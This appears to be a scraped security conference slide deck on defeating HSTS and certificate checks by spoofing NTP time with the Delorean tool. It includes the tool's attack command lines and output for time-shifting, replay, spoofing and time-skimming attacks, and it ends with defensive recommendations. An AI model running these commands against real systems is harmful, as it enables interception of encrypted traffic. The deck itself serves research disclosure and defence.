1. 1. Breaking SSL using time synchronisation attacks Jose Selvi, Senior Security Consultant
2. 2. $ whois jselvi Jose%Selvi% +10%years%working%in%security% Senior%Security%Consultant% SANS%Institute%Community%Instructor% GIAC%Security%Expert%(GSE)% Twitter:%@JoseSelvi% Blog:%http://www.pentester.es
3. 3. Valencia: Beach, Sun & Hacking
4. 4. Valencia: Beach, Sun & Hacking
5. 5. Whats the time?
6. 6. Disclaimer
7. 7. Lets Go! Starting from the beginning HTTP Strict Transport Security Get in a Delorean Modern Time Synchronisation More attacks Windows task scheduler Public Key Infrastructure Conclusions & Recommendations
8. 8. HTTP Strict Transport Security RFCK6797:%November%2012.% Also%known%as%HSTS%or%STS.% Prevent%HTTP%connections.% Prevent%accepting%selfKsigned%and% rogue%certificates.% Use%a%new%StrictKTransportKSecurity% header.
9. 9. How it work? Server HTTPS GET / HTTP/1.1 Client Strict-Transport-Security: max- age=3153600
10. 10. HSTS Timeline HTTPS connection 3153600 secs later
11. 11. Preloaded HSTS Hardcoded%list%of%well%known% website%names%that%should%always% use%HTTPS.% Prevent%the%security%gap%before% the%first%HTTPS%connection.% Google,%Twitter,%Paypal,%
12. 12. HTTPS connection 3153600 secs later
13. 13. 3153600 secs later
14. 14. Preloaded HSTS - Google http://www.chromium.org/sts
15. 15. Preloaded HSTS - Mozilla https://blog.mozilla.org/security/2012/11/01/preloading-hsts/
16. 16. Preloaded HSTS - Others
17. 17. Chromium Source Code
18. 18. Safari plist $%plutil%Kp%HSTS.plist { %%"com.apple.CFNetwork.defaultStorageSession"%=>%{ %%%%"ssl.googleKanalytics.com"%=>%Kinf %%%%"webmail.mayfirst.org"%=>%Kinf %%%%"braintreegateway.com"%=>%Kinf %%%%"code.google.com"%=>%Kinf %%%%"dm.mylookout.com"%=>%inf %%%%"therapynotes.com"%=>%inf %%%%"chrome.google.com"%=>%Kinf %%%%"sol.io"%=>%Kinf %%%%"www.sandbox.mydigipass.com"%=>%inf []
19. 19. HSTS weakness Its%security%relies%on%time.% It%completely%trust%the%OSs% current%time.% What%if%I%could%change%the% computer%clock%from%the% network?
20. 20. Lets Go! Starting from the beginning HTTP Strict Transport Security Get in a Delorean Modern Time Synchronisation More attacks Windows task scheduler Public Key Infrastructure Conclusions & Recommendations
21. 21. Network Time Protocol (NTP) Time%Synchronisation%Services.% RFCK1305%(v3)%/%RFCK5905%(v4)%/%RFCK4330% (SNTPv4).% By%default%in%(almost)%all%operating%systems.% No%secured%by%default.% Vulnerable%to%ManKinKtheKMiddle%attacks.
22. 22. NTP Packet: Ubuntu
23. 23. Delorean NTP%MitM%Tool.%Free.%Open%Source.%Python.% http://github.com/PentesterES/Delorean% Based%on%a%kimiflys%work:% http://github.com/limifly/ntpserver% Implements%several%attacks.% It%pretends%to%be%an%NTP%attack%suite.
24. 24. Delorean $%./delorean.py%Kh% Usage:%delorean.py%[options]% Options:% %%Kh,%KKhelp%%%%%%%%%%%%show%this%help%message%and%exit% %%Ki%INTERFACE,%KKinterface=INTERFACE% %%%%%%%%%%%%%%%%%%%%%%%%Listening%interface% %%Kp%PORT,%KKport=PORT%%Listening%port% %%Kn,%KKnobanner%%%%%%%%Not%show%Delorean%banner% %%Ks%STEP,%KKforceKstep=STEP% %%%%%%%%%%%%%%%%%%%%%%%%Force%the%time%step:%3m%(minutes),%4d%(days),%1M% %%%%%%%%%%%%%%%%%%%%%%%%(month)% %%Kd%DATE,%KKforceKdate=DATE% %%%%%%%%%%%%%%%%%%%%%%%%Force%the%date:%YYYYKMMKDD%hh:mm[:ss]% %%Kx,%KKrandomKdate%%%%%Use%random%date%each%time
25. 25. Basic attacks #%./delorean.py%Kn% [19:44:42]%Sent%to%192.168.10.113:123%K%Going%to%the%future!%2018K08K31%19:44% [19:45:18]%Sent%to%192.168.10.113:123%K%Going%to%the%future!%2018K08K31%19:45 #%./delorean.py%Kd%2020K08K01%23:15%Kn% [19:49:50]%Sent%to%127.0.0.1:48473%K%Going%to%the%future!%2020K08K01%21:15% [19:50:10]%Sent%to%127.0.0.1:52406%K%Going%to%the%future!%2020K08K01%21:15 #%./delorean.py%Kr%Kx% [19:51:17]%Sent%to%127.0.0.1:37680%K%Going%to%the%future!%2023K07K19%20:48% [19:51:21]%Sent%to%127.0.0.1:37680%K%Going%to%the%future!%2019K03K12%10:11 #%./delorean.py%Ks%10d%Kn% [19:46:09]%Sent%to%192.168.10.113:123%K%Going%to%the%future!%2015K08K10%19:46% [19:47:19]%Sent%to%192.168.10.113:123%K%Going%to%the%future!%2015K08K10%19:47
26. 26. DEMO
27. 27. Replay Attack $%./delorean.py%Kn%Kr%capture.pcap% [06:19:13]%Replayed%to%192.168.10.105:39895%K%Going%to%the%past!%2015K06K24%21:41% [06:19:17]%Replayed%to%192.168.10.105:39895%K%Going%to%the%past!%2015K06K24%21:41
28. 28. Spoofing Attack $%./delorean.py%Kn%Kf%192.168.10.10%Ko%8.8.8.8%Kr%capture.pcap%% Flooding%to%192.168.10.10% $%tcpdump%Knn%Kp%Ki%eth1%host%192.168.10.10% tcpdump:%verbose%output%suppressed,%use%Kv%or%Kvv%for%full%protocol%decode% listening%on%eth1,%linkKtype%EN10MB%(Ethernet),%capture%size%65535%bytes% 08:26:07.621412%IP%8.8.8.8.123%>%192.168.10.10.123:%NTPv4,%Server,%length%48% 08:26:07.682578%IP%8.8.8.8.123%>%192.168.10.10.123:%NTPv4,%Server,%length%48% 08:26:07.761407%IP%8.8.8.8.123%>%192.168.10.10.123:%NTPv4,%Server,%length%48% 08:26:07.766434%IP%8.8.8.8.123%>%192.168.10.10.123:%NTPv4,%Server,%length%48% 08:26:07.843923%IP%8.8.8.8.123%>%192.168.10.10.123:%NTPv4,%Server,%length%48% 08:26:07.905666%IP%8.8.8.8.123%>%192.168.10.10.123:%NTPv4,%Server,%length%48% 08:26:07.922923%IP%8.8.8.8.123%>%192.168.10.10.123:%NTPv4,%Server,%length%48
29. 29. Anti replaying
30. 30. Lets Go! Starting from the beginning HTTP Strict Transport Security Get in a Delorean Modern Time Synchronisation More attacks Windows task scheduler Public Key Infrastructure Conclusions & Recommendations
31. 31. Ubuntu Linux Very%simple% NTPv4.% Each%time%it%connects%to%a%network%(and%at% boot%time,%of%course). $%ls%/etc/network/ifKup.d/% 000resolvconf%%avahiKdaemon%%ntpdate%%wpasupplicant% avahiKautoipd%%%ethtool%%%%%%%%%%%%%upstart
32. 32. Fedora Linux The%easiest% NTPv3.% More%than%one%NTP%server% Requests%each%minute! $%tcpdump%Ki%eth0%Knn%src%port%123% 12:43:50.614191%IP%192.168.1.101.123%>%89.248.106.98.123:%NTPv3,%Client,%length%48% 12:44:55.696390%IP%192.168.1.101.123%>%213.194.159.3.123:%NTPv3,%Client,%length%48% 12:45:59.034059%IP%192.168.1.101.123%>%89.248.106.98.123:%NTPv3,%Client,%length%48
33. 33. Mac OS X - Mavericks New%synchronisation%service% NTP%daemon%exits,%but%not%synchronises.% Just%writes%in%/var/db/ntp.drift% A%new%service%called%pacemaker%check% that%file%and%change%the%clock.% It%seems%it%doesnt%work%as%it%should http://www.atmythoughts.com/livingKinKaKtechKfamilyKblog/2014/2/28/whatKtimeKisKit
34. 34. Does NTP work?
35. 35. /usr/libexec/ntpd-wrapper
36. 36. Mac OS X - Mavericks
37. 37. Windows NTPv3%but% The%most%secure.% Synchronisation%each%7%days.% More%than%15%hours%drift%isnt%allowed.% Domain%members%work%in%a%different% way.
38. 38. W32time service
39. 39. Max[Pos|Neg]PhaseCorrection W7 / W8 15 hours W2K12 48 hours
40. 40. What the Internet says?
41. 41. Time Skimming Attack 3153600 secs later Time Sync
42. 42. Time Skimming Attack 3153600 secs later Time Sync
43. 43. Time Skimming Attack #%./delorean.py%Kk%15h%Kt%10s%Kn% [21:57:26]%Sent%to%192.168.10.105:123%K%Going%to%the%future!%2015K06K11%12:57% [21:57:33]%Sent%to%192.168.10.105:123%K%Going%to%the%future!%2015K06K12%03:57% [21:57:37]%Sent%to%192.168.10.105:123%K%Going%to%the%future!%2015K06K12%18:56% [21:57:44]%Sent%to%192.168.10.105:123%K%Going%to%the%future!%2015K06K13%09:56% [21:57:50]%Sent%to%192.168.10.105:123%K%Going%to%the%future!%2015K06K14%00:56% [21:57:58]%Sent%to%192.168.10.105:123%K%Going%to%the%future!%2015K06K14%15:56% [21:58:04]%Sent%to%192.168.10.105:123%K%Going%to%the%future!%2015K06K15%06:56% [21:58:11]%Sent%to%192.168.10.105:123%K%Going%to%the%future!%2015K06K15%21:56% [21:58:17]%Sent%to%192.168.10.105:123%K%Going%to%the%future!%2015K06K16%12:56
44. 44. DEMO
45. 45. Manual Synchronisation
46. 46. Not a silver bullet
47. 47. Lots of things goes wrong
48. 48. Lets Go! Starting from the beginning HTTP Strict Transport Security Get in a Delorean Modern Time Synchronisation More attacks Windows task scheduler Public Key Infrastructure Conclusions & Recommendations
49. 49. Task scheduler
50. 50. Windows automatic updates
51. 51. Lets Go! Starting from the beginning HTTP Strict Transport Security Get in a Delorean Modern Time Synchronisation More attacks Windows task scheduler Public Key Infrastructure Conclusions & Recommendations
52. 52. PKI, CAs & Certificates
53. 53. Certificates from the past Data: Version: 3 (0x2) Serial Number: 5d:9e:f1:65:7f:f4:0c:14:e4:19:46:87:0b:b3:7b:fc Signature Algorithm: sha1WithRSAEncryption Issuer: C=US, ST=UT, L=Salt Lake City, O=The USERTRUST Network, OU=http://www.usertrust.com, CN=UTN-USERFirst-Hardware Validity Not Before: Sep 19 00:00:00 2008 GMT Not After : Nov 22 23:59:59 2010 GMT Subject: O=The SANS Institute, OU=Network Operations Center (NOC), OU=Comodo PremiumSSL Wildcard, CN=*.sans.org
54. 54. Edo Tensei no Jutsu!
55. 55. Weak certificates https://www.eff.org/observatory
56. 56. Looking around Las Vegas
57. 57. Lets look any other
58. 58. cado-nfs + ec2 in action
59. 59. DEMO
60. 60. Leaked certificates Certificate: Data: Version: 3 (0x2) Serial Number: 05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56 Signature Algorithm: sha1WithRSAEncryption Issuer: emailAddress = info@diginotar.nl commonName = DigiNotar Public CA 2025 organizationName = DigiNotar countryName = NL Validity Not Before: Jul 10 19:06:30 2011 GMT Not After : Jul 9 19:06:30 2013 GMT Subject: commonName = *.google.com serialNumber = PK000229200002 localityName = Mountain View organizationName = Google Inc countryName = US Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public Key: (2048 bit) Modulus (2048 bit):
61. 61. Heartbleed
62. 62. Debian PRNG
63. 63. Certificate Chain
64. 64. Revocation lists Revoked Certificates: Serial Number: 08CA22CD4F70A626B07C7A4DB75494FA Revocation Date: Nov 21 16:46:04 2013 GMT Serial Number: 017D4D9DF57B784B5D7DF0B9D450D37E Revocation Date: Nov 21 16:46:04 2013 GMT Serial Number: 061AD6AD34F67938C0870AAF74FC041A Revocation Date: Nov 21 17:16:03 2013 GMT Serial Number: 0FBBD7921F710C02FD9AFF2D4DDCDF12 Revocation Date: Nov 21 17:28:02 2013 GMT Serial Number: 0656A344CD735B2C52858A4A2AF96EE6 Revocation Date: Nov 21 18:23:02 2013 GMT Serial Number: 0F0C3DC4EE1229E280938DF6A889B178 Revocation Date: Nov 22 07:21:03 2013 GMT Serial Number: 0536AC86E884BE1773A78D4D232691A5 Revocation Date: Nov 22 09:52:05 2013 GMT Serial Number: 0335D45DC4E571A37BDE1869B44C1306 Revocation Date: Nov 24 00:45:02 2013 GMT
65. 65. A CRL over the years
66. 66. Purged CRLs???
67. 67. Purged CRLs??? CRL Issued%date Oldest%revoked DigiCert%SHA2%Extended%Validation%Server%CA% (Dropbox,%GitHub) 22/Oct/2013 13/Dec/2013% (330%certs) DigiCert%High%Assurance%CAK3% (Facebook) 02/Apr/2008% 14/Jun/2012% 27/Sep/2014 GeoTrust%Global%CA% (Google) 20/May/2002 21/May/2002% (9%certs) GlobalSign%Organization%Validation%CA%K% SHA256%K%G2%(LogmeIn) 20/Feb/2014% 31/Mar/2014% (637%certs) VeriSign%Class%3%Extended%Validation%SSL%CA% (Microsoft,%Paypal,%Twitter) 08/Nov/2006% 04/Dec/2012% (1709%certs) VeriSign%Class%3%Secure%Server%CA%K%G3% (Yahoo) 07/Feb/2010 10/Oct/2010% (41120%certs)
68. 68. Online Certificate Status Protocol
69. 69. What if I cant connect? https://www.grc.com/revocation/implementations.htm
70. 70. DEMO
71. 71. Lets Go! Starting from the beginning HTTP Strict Transport Security Get in a Delorean Modern Time Synchronisation More attacks Windows task scheduler Public Key Infrastructure Conclusions & Recommendations
72. 72. Conclusions & Recommendations Facts Time synchronisation isnt managed securely by most operating system vendors. Many security protections relies in time. If an attacker can control the local clock, lots of things can go wrong. What to do Configure NTP synchronisation in a secure way (Microsoft does): Signature. Maximum drift. Block SSL certificates which expiry date is before the browser build date or the last update (Chrome does).
73. 73. Special thanks to Pedro Candel (my leaked certs dealer). Juan Garrido (microsoft guru). Tom Ritter (my factoring mentor). All the NCC Group guys and resources. /mode +nostalgic JoseSelvi People who created the Back to the Future saga, War Games, and all those amazing 80s movies and series :)
74. 74. 71 Jose Selvi http://twitter.com/JoseSelvi jselvi@pentester.es http://www.pentester.es Jose.Selvi@nccgroup.trust http://www.nccgroup.trust Thanks! Questions?